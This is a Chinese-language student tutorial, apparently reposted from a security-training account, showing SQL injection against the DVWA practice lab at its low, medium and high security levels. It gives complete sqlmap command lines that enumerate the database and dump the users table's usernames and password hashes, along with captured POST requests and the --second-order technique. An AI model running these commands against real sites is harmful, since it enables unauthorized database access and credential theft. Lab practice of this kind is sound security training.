【学员分享】基于sqlmap对DVWA靶场SQL注入进行破解

  • A+
所属分类:安全文章

本文作者:啊昊(WEB安全攻防星球学员)


LOW等级



尝试正确的提交方式:

【学员分享】基于sqlmap对DVWA靶场SQL注入进行破解

查看地址:

http://www.d.com/DVWA-1.9/vulnerabilities/sqli/?id=&Submit=Submit#

查看cookie

cookie:security=low; PHPSESSID=ssgdhr8nr2s5locu7amule13q5

通过网址我们可以发现,提交方式是用Get方式的!开启sqlmap对改网址进行扫描:

C:Python27sqlmap>sqlmap.py -u "http://www.d.com/DVWA-1.9/vulnerabilities/sqli/?id=&Submit=Submit#" --cookie "security=low; PHPSESSID=ssgdhr8nr2s5locu7amule13q5"

【学员分享】基于sqlmap对DVWA靶场SQL注入进行破解

发现提示,有注入点,选择no。开始下个阶段的注入。 
查看数据库:
C:Python27sqlmap>sqlmap.py -u "http://www.d.com/DVWA-1.9/vulnerabilities/sqli/?id=&Submit=Submit#" --cookie "security=low; PHPSESSID=ssgdhr8nr2s5locu7amule13q5" --current-db

【学员分享】基于sqlmap对DVWA靶场SQL注入进行破解

查询表:
C:Python27sqlmap>sqlmap.py -u "http://www.d.com/DVWA-1.9/vulnerabilities/sqli/?id=&Submit=Submit#" --cookie "security=low; PHPSESSID=ssgdhr8nr2s5locu7amule13q5" --tables -D"dvwa"

【学员分享】基于sqlmap对DVWA靶场SQL注入进行破解

查询users表中的字段:
C:Python27sqlmap>sqlmap.py -u "http://www.d.com/DVWA-1.9/vulnerabilities/sqli/?id=&Submit=Submit#" --cookie "security=low;PHPSESSID=ssgdhr8nr2s5locu7amule13q5" --columns -D"dvwa" -T"users"

【学员分享】基于sqlmap对DVWA靶场SQL注入进行破解

查询表中user,和passsword的信息:

C:Python27sqlmap>sqlmap.py -u "http://www.d.com/DVWA1.9/vulnerabilities/sqli/?id=&Submit=Submit#" --cookie "security=low;PHPSESSID=ssgdhr8nr2s5locu7amule13q5" --dump -D"dvwa" -T"users" -C"user,password"

得到结果,并计算出hash值:

【学员分享】基于sqlmap对DVWA靶场SQL注入进行破解


Medium等级


正常提交请求:

【学员分享】基于sqlmap对DVWA靶场SQL注入进行破解

【学员分享】基于sqlmap对DVWA靶场SQL注入进行破解

网址:

http://www.d.com/DVWA-1.9/vulnerabilities/sqli/#

cookie值:

security=medium; PHPSESSID=ssgdhr8nr2s5locu7amule13q5

用第一次的方法去测试: 
[CRITICAL] no parameter(s) found for testing in the provided data (e.g. GET parameter 'id' in 'www.site.com/index.php?id=1')
发现sqlmap报错。

查看数据包:
POST /DVWA-1.9/vulnerabilities/sqli/ HTTP/1.1Host: www.d.comUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateReferer: http://www.d.com/DVWA-1.9/vulnerabilities/sqli/Cookie: security=medium; PHPSESSID=ssgdhr8nr2s5locu7amule13q5DNT: 1X-Forwarded-For: 8.8.8.8Connection: keep-aliveUpgrade-Insecure-Requests: 1Content-Type: application/x-www-form-urlencodedContent-Length: 18id=1&Submit=Submit

发现提交网址为:/DVWA-1.9/vulnerabilities/sqli/,提交的数据包为id=1&Submit=Submit。

因此在sqlmap用如下指令进行测试:

sqlmap.py -u "http://www.d.com/DVWA-1.9/vulnerabilities/sqli/" --cookie "security=medium;PHPSESSID=ssgdhr8nr2s5locu7amule13q5" --data "id=1&Submit=Submit"

期待的结果到来了:

【学员分享】基于sqlmap对DVWA靶场SQL注入进行破解

OK,重复LOW级别的操作就可以拿到用户的账户和密码了。


High等级

正常提交请求:

【学员分享】基于sqlmap对DVWA靶场SQL注入进行破解

页面跳转了,难道我们的sqlmap行不通了?尝试用中级的方法,发现不到漏洞,因为页面已经跳转了,别慌,我们还有--second-order这个办法!
首先我们先抓取下数据包:
POST /DVWA-1.9/vulnerabilities/sqli/session-input.php HTTP/1.1Host: www.d.comUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateReferer: http://www.d.com/DVWA-1.9/vulnerabilities/sqli/session-input.phpCookie: security=high; PHPSESSID=ssgdhr8nr2s5locu7amule13q5DNT: 1X-Forwarded-For: 8.8.8.8Connection: keep-aliveUpgrade-Insecure-Requests: 1Content-Type: application/x-www-form-urlencodedContent-Length: 18id=1&Submit=Submit

【学员分享】基于sqlmap对DVWA靶场SQL注入进行破解

可以看到,这是从/session-input.php来的要去到我们之前的页面

/DVWA-1.9/vulnerabilities/sqli/

OK,可以尝试一下了。

sqlmap.py -u "http://www.d.com/DVWA-1.9/vulnerabilities/sqli/session-input.php” --data "id=1&Submit=Submit" -p "id" --cookie "security=high;PHPSESSID=ssgdhr8nr2s5locu7amule13q5" --second-order "http://www.d.com/DVWA-1.9/vulnerabilities/sqli/"

【学员分享】基于sqlmap对DVWA靶场SQL注入进行破解

【学员分享】基于sqlmap对DVWA靶场SQL注入进行破解

看到这个出现,嘿嘿,接下来那就和low级别一样就好啦!


总结

sqlmap真是一款注入神器呀!!!





扫描下方二维码加入Web安全星球学习

加入后会邀请你进入内部微信群,内部微信群永久有效!

【学员分享】基于sqlmap对DVWA靶场SQL注入进行破解

目前25000+人已关注加入我们

【学员分享】基于sqlmap对DVWA靶场SQL注入进行破解

本文始发于微信公众号(Ms08067安全实验室):【学员分享】基于sqlmap对DVWA靶场SQL注入进行破解

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: